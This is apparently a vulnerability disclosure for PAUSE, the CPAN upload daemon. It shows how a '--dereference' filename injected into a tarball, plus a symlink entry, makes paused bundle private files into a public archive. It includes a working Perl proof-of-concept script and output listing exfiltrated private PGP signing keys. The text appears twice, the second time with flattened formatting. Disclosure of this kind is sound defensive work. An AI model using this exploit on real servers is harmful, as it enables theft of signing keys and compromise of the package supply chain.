Summary
It may be possible to extract any file or directory accessible to the user running paused via a crafted tarball upload.
The PoC below demonstrates how an attacker can instrument a tarball with malicious entries to exfiltrate the private PGP keys from /home/pause/pause-private.
A local installation of PAUSE has been used to find this issue.
Details
When paused recreates tarballs that have files with world writable permissions, we can inject a --dereference option as a filename via @children in _rewrite_tarball
|
$rc = 0 == system tar => $taropt, "-cf", $path, @children or die "Could not tar c"; |
This allows symlinks to be followed, and we can use symlinks in the original tarball to include any path on the filesystem that the pause user has access to. These paths will be included in the recreated tarball which will be available to the attacker (and probably everyone else).
PoC
- Prepare a distribution for upload, for example
SymlinkAttack-0.001.tar.gz
- Use the script below to add the exploit code to the tarball
$ ./inject-exploit.pl SymlinkAttack-0.001.tar.gz
- Upload the tarball as an author to PAUSE, and wait for
paused to process it
- Download the rewritten tarball now containing the contents of
/home/pause/pause-private from /pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gz
#!/usr/bin/env perl
use strict;
use Archive::Tar;
use File::Basename;
my ($tarball) = $ARGV[0]; # Tarball to inject attack into
my $basename = basename($tarball, ".tar.gz");
my $tar = Archive::Tar->new;
$tar->read($tarball) or die "Failed to read $tarball";
# Inject an additional argument to the tar command used when recreating
# tarballs, this will become a "multiple root" tarball that is not indexed
$tar->add_data("--dereference", "foo");
# Create a file with world writable permissions, to trigger the actual
# recreation of tarball
$tar->add_data("$basename/world-writable", "foo", { mode=> 0777});
$tar->add_data("$basename/LOOT", '', {
type => Archive::Tar::SYMLINK,
# Directory containing files we want to steal
linkname => "/home/pause/pause-private/",
# Set mode 0755 so paused doesn't attempt to
# chmod it, symlinks are 0777 usually
mode => 0755
});
# Write the modified tarball back
$tar->write($tarball, 1) or die "Failed to write tarball";Example tarball output:
# tar tvvf /data/pause/pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gz | grep LOOT
drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/
drwx------ pause/pause 0 2024-11-01 19:52 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/
-rw------- pause/pause 32 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx~
drwx------ pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/
-rw------- pause/pause 2867 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/CBEA3D65A6CD867B05CB80E89ED067BB1D33DCDB.key
-rw------- pause/pause 2869 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/8916C5A361323FC2377CF477BF145A1001A3F626.key
-rw-r--r-- pause/pause 1963 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx
-rw------- pause/pause 1200 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/trustdb.gpg
drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/
-rw-r--r-- pause/pause 508 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/PrivatePAUSE.pm
stigtsp Reporter
Summary
It may be possible to extract any file or directory accessible to the user running
pausedvia a crafted tarball upload.The PoC below demonstrates how an attacker can instrument a tarball with malicious entries to exfiltrate the private PGP keys from
/home/pause/pause-private.A local installation of PAUSE has been used to find this issue.
Details
When
pausedrecreates tarballs that have files with world writable permissions, we can inject a--dereferenceoption as a filename via@childrenin_rewrite_tarballpause/bin/paused
Line 908 in 9d85ccc
This allows symlinks to be followed, and we can use symlinks in the original tarball to include any path on the filesystem that the
pauseuser has access to. These paths will be included in the recreated tarball which will be available to the attacker (and probably everyone else).PoC
SymlinkAttack-0.001.tar.gz$ ./inject-exploit.pl SymlinkAttack-0.001.tar.gzpausedto process it/home/pause/pause-privatefrom/pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gzExample tarball output:
# tar tvvf /data/pause/pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gz | grep LOOT drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/ drwx------ pause/pause 0 2024-11-01 19:52 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/ -rw------- pause/pause 32 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx~ drwx------ pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/ -rw------- pause/pause 2867 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/CBEA3D65A6CD867B05CB80E89ED067BB1D33DCDB.key -rw------- pause/pause 2869 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/8916C5A361323FC2377CF477BF145A1001A3F626.key -rw-r--r-- pause/pause 1963 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx -rw------- pause/pause 1200 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/trustdb.gpg drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/ -rw-r--r-- pause/pause 508 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/PrivatePAUSE.pm